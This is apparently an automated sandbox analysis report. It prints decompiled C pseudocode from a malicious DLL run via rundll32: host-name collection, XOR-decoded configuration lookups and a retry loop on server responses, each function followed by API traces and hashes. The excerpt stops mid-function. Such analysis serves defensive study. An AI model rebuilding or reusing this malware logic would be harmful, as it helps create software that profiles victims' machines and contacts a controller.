                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID: Ut
                                • API String ID: 1500278894-8415677
                                • Opcode ID: 9616996d200a29f190215866f159ead86a5479d28bc3cbcd7a67a8286476d228
                                • Instruction ID: 2f28e6ebb918d3e1cc7a102e5d9d96b4d2da0a55b8b40cc35915944286605ad4
                                • Opcode Fuzzy Hash: 9616996d200a29f190215866f159ead86a5479d28bc3cbcd7a67a8286476d228
                                • Instruction Fuzzy Hash: 0101A23A600209BBEB216FA4DC44F9F7BB9EFC4754F004029FA049A1A0EB72E956C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 47%
                                			E04A44A2A(char* _a4, char** _a8) {
                                				char* _t7;
                                				char* _t11;
                                				char* _t14;
                                				char* _t16;
                                				char* _t17;
                                				char _t18;
                                				signed int _t20;
                                				signed int _t22;
                                
                                				_t16 = _a4;
                                				_push(0x20);
                                				_t20 = 1;
                                				_push(_t16);
                                				while(1) {
                                					_t7 = StrChrA();
                                					if(_t7 == 0) {
                                						break;
                                					}
                                					_t20 = _t20 + 1;
                                					_push(0x20);
                                					_push( &(_t7[1]));
                                				}
                                				_t11 = E04A41525(_t20 << 2);
                                				_a4 = _t11;
                                				if(_t11 != 0) {
                                					StrTrimA(_t16, 0x4a4c284); // executed
                                					_t22 = 0;
                                					do {
                                						_t14 = StrChrA(_t16, 0x20);
                                						if(_t14 != 0) {
                                							 *_t14 = 0;
                                							do {
                                								_t14 =  &(_t14[1]);
                                								_t18 =  *_t14;
                                							} while (_t18 == 0x20 || _t18 == 9);
                                						}
                                						_t17 = _a4;
                                						 *(_t17 + _t22 * 4) = _t16;
                                						_t22 = _t22 + 1;
                                						_t16 = _t14;
                                					} while (_t14 != 0);
                                					 *_a8 = _t17;
                                				}
                                				return 0;
                                			}

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,04E595AC,04A430F3,?,04A41173,?,04E595AC,?,04A430F3), ref: 04A44A46
                                • StrTrimA.SHLWAPI(?,04A4C284,00000002,?,04A41173,?,04E595AC,?,04A430F3), ref: 04A44A64
                                • StrChrA.SHLWAPI(?,00000020,?,04A41173,?,04E595AC,?,04A430F3), ref: 04A44A6F
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 2287ef81fc6bb8eee3f422a4eb6090d324ebb6cbafbf6e4edcf6278a8ddd6ec1
                                • Instruction ID: 1ed0b0c897228e091a080e0f3c6e0292f1f68252449645646e66f797d7aec2bc
                                • Opcode Fuzzy Hash: 2287ef81fc6bb8eee3f422a4eb6090d324ebb6cbafbf6e4edcf6278a8ddd6ec1
                                • Instruction Fuzzy Hash: 7E018F723003066FE7205F6A9C48F6F7B9DEBC9754F955021B945CB2C2DA74E8428764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A48B22(void* _a4) {
                                				char _t2;
                                
                                				_t2 = RtlFreeHeap( *0x4a4d238, 0, _a4); // executed
                                				return _t2;
                                			}

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: 118a00ae6e82923b5ff671ccca8787e5d87fb97ab7ff865ac5500bb25eae7811
                                • Instruction ID: fa29c85493235b080aecb97e0d2e276b619fc5b94fd147a4bb63f46c7d8d6fb8
                                • Opcode Fuzzy Hash: 118a00ae6e82923b5ff671ccca8787e5d87fb97ab7ff865ac5500bb25eae7811
                                • Instruction Fuzzy Hash: 1DB01279100100ABEB114F50DE04F0DFA21EBF0700F014010F3080807087374C22FB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E04A476E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                				void* _v8;
                                				void* __esi;
                                				intOrPtr* _t35;
                                				void* _t40;
                                				intOrPtr* _t41;
                                				intOrPtr* _t43;
                                				intOrPtr* _t45;
                                				intOrPtr* _t50;
                                				intOrPtr* _t52;
                                				void* _t54;
                                				intOrPtr* _t55;
                                				intOrPtr* _t57;
                                				intOrPtr* _t61;
                                				intOrPtr* _t65;
                                				intOrPtr _t68;
                                				void* _t72;
                                				void* _t75;
                                				void* _t76;
                                
                                				_t55 = _a4;
                                				_t35 =  *((intOrPtr*)(_t55 + 4));
                                				_a4 = 0;
                                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                				if(_t76 < 0) {
                                					L18:
                                					return _t76;
                                				}
                                				_t40 = E04A48A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                				_t76 = _t40;
                                				if(_t76 >= 0) {
                                					_t61 = _a28;
                                					if(_t61 != 0 &&  *_t61 != 0) {
                                						_t52 = _v8;
                                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                					}
                                					if(_t76 >= 0) {
                                						_t43 =  *_t55;
                                						_t68 =  *0x4a4d2a8; // 0x40a5a8
                                						_t20 = _t68 + 0x4a4e1fc; // 0x740053
                                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                						if(_t76 >= 0) {
                                							_t76 = E04A4A6BC(_a4);
                                							if(_t76 >= 0) {
                                								_t65 = _a28;
                                								if(_t65 != 0 &&  *_t65 == 0) {
                                									_t50 = _a4;
                                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                								}
                                							}
                                						}
                                						_t45 = _a4;
                                						if(_t45 != 0) {
                                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                						}
                                						_t57 = __imp__#6;
                                						if(_a20 != 0) {
                                							 *_t57(_a20);
                                						}
                                						if(_a12 != 0) {
                                							 *_t57(_a12);
                                						}
                                					}
                                				}
                                				_t41 = _v8;
                                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                				goto L18;
                                			}

                                APIs
                                  • Part of subcall function 04A48A19: SysAllocString.OLEAUT32(80000002), ref: 04A48A76
                                  • Part of subcall function 04A48A19: SysFreeString.OLEAUT32(00000000), ref: 04A48ADC
                                • SysFreeString.OLEAUT32(?), ref: 04A477C6
                                • SysFreeString.OLEAUT32(04A44BD8), ref: 04A477D0
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 67cfae7a96253aaf3b3ad1f6d728ffbffad14b28ffba9e6d2ae63db0a15a481f
                                • Instruction ID: 45e300e8efd8d9a8092ba6c41c485f70ccb10ca8e8b87b3702836c59a2225f51
                                • Opcode Fuzzy Hash: 67cfae7a96253aaf3b3ad1f6d728ffbffad14b28ffba9e6d2ae63db0a15a481f
                                • Instruction Fuzzy Hash: 643148BA500158AFDB11DF98C888C9FBB79FFC97407558658F8159B220E372ED52CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(04A45C8D), ref: 04A44AD8
                                  • Part of subcall function 04A476E7: SysFreeString.OLEAUT32(?), ref: 04A477C6
                                • SysFreeString.OLEAUT32(00000000), ref: 04A44B19
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 00e3f5cc74a550ca815749b7d848a627512a8703ef14ddddd1ddc70241d2c09a
                                • Instruction ID: fecbc6baff7e7ddb70349a691eba8dd8f65a60191b6446b6120e78ba4efb2196
                                • Opcode Fuzzy Hash: 00e3f5cc74a550ca815749b7d848a627512a8703ef14ddddd1ddc70241d2c09a
                                • Instruction Fuzzy Hash: BD016275511109BFDB419FA8D804EAFBBB9FFD8710B014021F908E7120D7319D16CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A45D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                				void* _t21;
                                				void* _t22;
                                				signed int _t24;
                                				intOrPtr* _t26;
                                				void* _t27;
                                
                                				_t26 = __edi;
                                				if(_a4 == 0) {
                                					L2:
                                					_t27 = E04A47DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                					if(_t27 == 0) {
                                						_t24 = _a12 >> 1;
                                						if(_t24 == 0) {
                                							_t27 = 2;
                                							HeapFree( *0x4a4d238, 0, _a4);
                                						} else {
                                							_t21 = _a4;
                                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                							 *_t26 = _t21;
                                						}
                                					}
                                					L6:
                                					return _t27;
                                				}
                                				_t22 = E04A41037(_a4, _a8, _a12, __edi); // executed
                                				_t27 = _t22;
                                				if(_t27 == 0) {
                                					goto L6;
                                				}
                                				goto L2;
                                			}

                                APIs
                                  • Part of subcall function 04A41037: SysFreeString.OLEAUT32(00000000), ref: 04A4109A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,04A45356,?,004F0053,04E59368,00000000,?), ref: 04A45DDC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID: Ut
                                • API String ID: 3806048269-8415677
                                • Opcode ID: 3b250d31ef84c65eaf73e3d994355cd310d8a256b889be605d316510a39aaec5
                                • Instruction ID: f405d5f31170bf5036c52a53d6d14ba877a9bfe8a9cbcac50ff70c7199b6c11e
                                • Opcode Fuzzy Hash: 3b250d31ef84c65eaf73e3d994355cd310d8a256b889be605d316510a39aaec5
                                • Instruction Fuzzy Hash: CF014632500619BBDB22DF54CC08FEE7BA5EFD8790F048029FE099A120D732E961DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E04A4831C(void* __ecx) {
                                				signed int _v8;
                                				void* _t15;
                                				void* _t19;
                                				void* _t20;
                                				void* _t22;
                                				intOrPtr* _t23;
                                
                                				_t23 = __imp__;
                                				_t20 = 0;
                                				_v8 = _v8 & 0;
                                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                				_t10 = _v8;
                                				if(_v8 != 0) {
                                					_t20 = E04A41525(_t10 + 1);
                                					if(_t20 != 0) {
                                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                						if(_t15 != 0) {
                                							 *((char*)(_v8 + _t20)) = 0;
                                						} else {
                                							E04A48B22(_t20);
                                							_t20 = 0;
                                						}
                                					}
                                				}
                                				return _t20;
                                			}









                                Instruction addresses (one per statement, in listing order): 0x04a48321 0x04a4832c 0x04a4832e 0x04a48334 0x04a48336 0x04a4833b 0x04a48344 0x04a48348 0x04a48351 0x04a48355 0x04a48364 0x04a48357 0x04a48358 0x04a4835d 0x04a4835d 0x04a48355 0x04a48348 0x04a4836d

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,04A49C7E,74E5F710,00000000,?,?,04A49C7E), ref: 04A48334
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • GetComputerNameExA.KERNEL32(00000003,00000000,04A49C7E,04A49C7F,?,?,04A49C7E), ref: 04A48351
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: bdcac344ebb51329486160f1bc26ee0a4755623e3871fde9d11ce61c1d237a32
                                • Instruction ID: 0ac4e5ff7e391731c62c8e6c90167677f2f4c7df07772c6741386e6d81232819
                                • Opcode Fuzzy Hash: bdcac344ebb51329486160f1bc26ee0a4755623e3871fde9d11ce61c1d237a32
                                • Instruction Fuzzy Hash: 26F0307A600205AEEB21E69A9D04EEF66BCEBC5750F111059A504E3140EA74FE029660
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _t4;
                                				void* _t10;
                                				void* _t11;
                                				void* _t12;
                                				void* _t14;
                                
                                				_t14 = 1;
                                				_t4 = _a8;
                                				if(_t4 == 0) {
                                					if(InterlockedDecrement(0x4a4d23c) == 0) {
                                						E04A44DB1();
                                					}
                                				} else {
                                					if(_t4 == 1 && InterlockedIncrement(0x4a4d23c) == 1) {
                                						_t10 = E04A42789(_t11, _t12, _a4); // executed
                                						if(_t10 != 0) {
                                							_t14 = 0;
                                						}
                                					}
                                				}
                                				return _t14;
                                			}








                                Instruction addresses (one per statement, in listing order): 0x04a47f04 0x04a47f05 0x04a47f08 0x04a47f3a 0x04a47f3c 0x04a47f3c 0x04a47f0a 0x04a47f0b 0x04a47f20 0x04a47f27 0x04a47f29 0x04a47f29 0x04a47f27 0x04a47f0b 0x04a47f44

                                APIs
                                • InterlockedIncrement.KERNEL32(04A4D23C), ref: 04A47F12
                                  • Part of subcall function 04A42789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04A47F25,?), ref: 04A4279C
                                • InterlockedDecrement.KERNEL32(04A4D23C), ref: 04A47F32
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: d7f791ca66066f2600ddc36e9eceb7e2502ffb9c64c0a43971e39d91f5bf782c
                                • Instruction ID: ab82fd7ae7a076696beeaa715b87715b1fdad30991b4d1322eefd4b42b8124b6
                                • Opcode Fuzzy Hash: d7f791ca66066f2600ddc36e9eceb7e2502ffb9c64c0a43971e39d91f5bf782c
                                • Instruction Fuzzy Hash: A9E08C393081B2A3AB216BB49848B6EA650ABE0BD5F22D454F886D10D0D722F851D6F1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A4933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                				intOrPtr _v12;
                                				signed int _v20;
                                				intOrPtr _v24;
                                				signed int _v60;
                                				char _v68;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				intOrPtr _t14;
                                				signed int* _t16;
                                				signed int _t25;
                                				signed int _t26;
                                				signed int* _t28;
                                				signed int _t30;
                                
                                				_t28 = __ecx;
                                				_t14 =  *0x4a4d2c8; // 0x4e59618
                                				_v12 = _t14;
                                				_t16 = _a12;
                                				_t30 = 8;
                                				if(_t16 != 0) {
                                					 *_t16 =  *_t16 & 0x00000000;
                                				}
                                				do {
                                					_t31 =  &_v68;
                                					if(E04A48C01( &_v68) == 0) {
                                						goto L16;
                                					}
                                					_t30 = E04A497F7(_t31, _a4, _v12);
                                					if(_t30 == 0) {
                                						_t25 = E04A45988(_t31, _t28); // executed
                                						_t30 = _t25;
                                						if(_t30 != 0) {
                                							if(_t30 == 0x102) {
                                								E04A4D000 = E04A4D000 + 0xea60;
                                							}
                                						} else {
                                							if(_v24 != 0xc8) {
                                								_t30 = 0xe8;
                                							} else {
                                								_t26 = _v20;
                                								if(_t26 == 0) {
                                									_t30 = 0x10d2;
                                								} else {
                                									_t28 = _a8;
                                									if(_t28 != 0) {
                                										_v60 = _v60 & _t30;
                                										 *_t28 = _v60;
                                										_t28 = _a12;
                                										if(_t28 != 0) {
                                											 *_t28 = _t26;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                					E04A458DB( &_v68, 0x102, _t28, _t30);
                                					L16:
                                				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x4a4d26c, 0) == 0x102);
                                				return _t30;
                                			}

















                                Instruction addresses (one per statement, in listing order; 0x00000000 marks a goto): 0x04a4933a 0x04a49340 0x04a49347 0x04a4934f 0x04a49355 0x04a49358 0x04a4935a 0x04a4935a 0x04a49362 0x04a49362 0x04a4936c 0x00000000 0x00000000 0x04a4937b 0x04a4937f 0x04a49383 0x04a49388 0x04a4938c 0x04a493c8 0x04a493ca 0x04a493ca 0x04a4938e 0x04a49395 0x04a493bf 0x04a49397 0x04a49397 0x04a4939c 0x04a493b8 0x04a4939e 0x04a4939e 0x04a493a3 0x04a493a8 0x04a493ab 0x04a493ad 0x04a493b2 0x04a493b4 0x04a493b4 0x04a493b2 0x04a493a3 0x04a4939c 0x04a49395 0x04a4938c 0x04a493d7 0x04a493dc 0x04a493dc 0x04a49400

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 04A493EC
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: 4cae19feeb52574531c520bb4194975ad0b2f04b0a7e4b680532dbae3a8a8204
                                • Instruction ID: 7d9113af95fe3a375eaa133016453d76bf555360999d0ed3b1054ca4117446e0
                                • Opcode Fuzzy Hash: 4cae19feeb52574531c520bb4194975ad0b2f04b0a7e4b680532dbae3a8a8204
                                • Instruction Fuzzy Hash: 6F219DB67002099BEF11DF69D854AAF77B9ABC2364F10402DE505AB2E0DB75FC22C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 34%
                                			E04A41037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                				intOrPtr _v12;
                                				void* _v18;
                                				char _v20;
                                				intOrPtr _t15;
                                				void* _t17;
                                				intOrPtr _t19;
                                				void* _t23;
                                
                                				_v20 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				_t15 =  *0x4a4d2a8; // 0x40a5a8
                                				_t4 = _t15 + 0x4a4e39c; // 0x4e58944
                                				_t20 = _t4;
                                				_t6 = _t15 + 0x4a4e124; // 0x650047
                                				_t17 = E04A476E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                				if(_t17 < 0) {
                                					_t23 = _t17;
                                				} else {
                                					_t23 = 8;
                                					if(_v20 != _t23) {
                                						_t23 = 1;
                                					} else {
                                						_t19 = E04A47EA4(_t20, _v12);
                                						if(_t19 != 0) {
                                							 *_a16 = _t19;
                                							_t23 = 0;
                                						}
                                						__imp__#6(_v12);
                                					}
                                				}
                                				return _t23;
                                			}










                                Instruction addresses (one per statement, in listing order): 0x04a41041 0x04a41048 0x04a41049 0x04a4104a 0x04a4104b 0x04a41051 0x04a41056 0x04a41056 0x04a41060 0x04a41072 0x04a41079 0x04a410a7 0x04a4107b 0x04a4107d 0x04a41082 0x04a410a4 0x04a41084 0x04a41087 0x04a4108e 0x04a41093 0x04a41095 0x04a41095 0x04a4109a 0x04a4109a 0x04a41082 0x04a410ae

                                APIs
                                  • Part of subcall function 04A476E7: SysFreeString.OLEAUT32(?), ref: 04A477C6
                                  • Part of subcall function 04A47EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04A451D4,004F0053,00000000,?), ref: 04A47EAD
                                  • Part of subcall function 04A47EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04A451D4,004F0053,00000000,?), ref: 04A47ED7
                                  • Part of subcall function 04A47EA4: memset.NTDLL ref: 04A47EEB
                                • SysFreeString.OLEAUT32(00000000), ref: 04A4109A
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: 9a8aad7ae3ef4606d0f8b0a5e60f769ff84868f75786325c946f5c81667def9e
                                • Instruction ID: ed598f775d1c8720f1290fc8f3997d68bc5eda45418f96e5d1a746ecfd5b1118
                                • Opcode Fuzzy Hash: 9a8aad7ae3ef4606d0f8b0a5e60f769ff84868f75786325c946f5c81667def9e
                                • Instruction Fuzzy Hash: 96015E36600169BFEB519FA9CC04DAEBBB9FBD4350F004565E904E6160E7B1ED518790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A44538(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
                                				void* _t17;
                                
                                				if(_a4 == 0) {
                                					L2:
                                					return E04A49AD9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                				}
                                				_t17 = E04A44ABF(_a4, _a8, _a12, _a16, _a20); // executed
                                				if(_t17 != 0) {
                                					goto L2;
                                				}
                                				return _t17;
                                			}




                                Instruction addresses (one per statement, in listing order; 0x00000000 marks a goto): 0x04a44540 0x04a4455a 0x00000000 0x04a44576 0x04a44551 0x04a44558 0x00000000 0x00000000 0x04a4457d

                                APIs
                                • lstrlenW.KERNEL32(?,?,?,04A44CF3,3D04A4C0,80000002,04A49900,04A45C8D,74666F53,4D4C4B48,04A45C8D,?,3D04A4C0,80000002,04A49900,?), ref: 04A4455D
                                  • Part of subcall function 04A44ABF: SysAllocString.OLEAUT32(04A45C8D), ref: 04A44AD8
                                  • Part of subcall function 04A44ABF: SysFreeString.OLEAUT32(00000000), ref: 04A44B19
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFreelstrlen
                                • String ID:
                                • API String ID: 3808004451-0
                                • Opcode ID: 7a79c449f7c6965e715bb6b935c6887ac303f76ce3283778924a484b234905ba
                                • Instruction ID: 1b0ee6c7be5c1e6d3557c84039db994cd73bd43a1082cea04ce359e212fc8efb
                                • Opcode Fuzzy Hash: 7a79c449f7c6965e715bb6b935c6887ac303f76ce3283778924a484b234905ba
                                • Instruction Fuzzy Hash: F5F0923200010EBFDF129F90DD05EEE3F6AEB98355F048024BA18540A0D732DAB1EBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                C-Code - Quality: 96%
                                			E04A47FBE(int* __ecx) {
                                				int _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* __esi;
                                				signed int _t28;
                                				signed int _t33;
                                				signed int _t39;
                                				char* _t45;
                                				char* _t46;
                                				char* _t47;
                                				char* _t48;
                                				char* _t49;
                                				char* _t50;
                                				void* _t51;
                                				void* _t52;
                                				void* _t53;
                                				intOrPtr _t54;
                                				void* _t56;
                                				intOrPtr _t57;
                                				intOrPtr _t58;
                                				signed int _t61;
                                				intOrPtr _t64;
                                				signed int _t65;
                                				signed int _t70;
                                				void* _t72;
                                				void* _t73;
                                				signed int _t75;
                                				signed int _t78;
                                				signed int _t82;
                                				signed int _t86;
                                				signed int _t90;
                                				signed int _t94;
                                				signed int _t98;
                                				void* _t103;
                                				intOrPtr _t121;
                                
                                				_t104 = __ecx;
                                				_t28 =  *0x4a4d2a4; // 0x69b25f44
                                				if(E04A46247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
                                					 *0x4a4d2d8 = _v8;
                                				}
                                				_t33 =  *0x4a4d2a4; // 0x69b25f44
                                				if(E04A46247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                					_v12 = 2;
                                					L69:
                                					return _v12;
                                				}
                                				_t39 =  *0x4a4d2a4; // 0x69b25f44
                                				if(E04A46247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                					L67:
                                					HeapFree( *0x4a4d238, 0, _v16);
                                					goto L69;
                                				} else {
                                					_t103 = _v12;
                                					if(_t103 == 0) {
                                						_t45 = 0;
                                					} else {
                                						_t98 =  *0x4a4d2a4; // 0x69b25f44
                                						_t45 = E04A49403(_t104, _t103, _t98 ^ 0x7895433b);
                                					}
                                					if(_t45 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                							 *0x4a4d240 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t46 = 0;
                                					} else {
                                						_t94 =  *0x4a4d2a4; // 0x69b25f44
                                						_t46 = E04A49403(_t104, _t103, _t94 ^ 0x219b08c7);
                                					}
                                					if(_t46 != 0) {
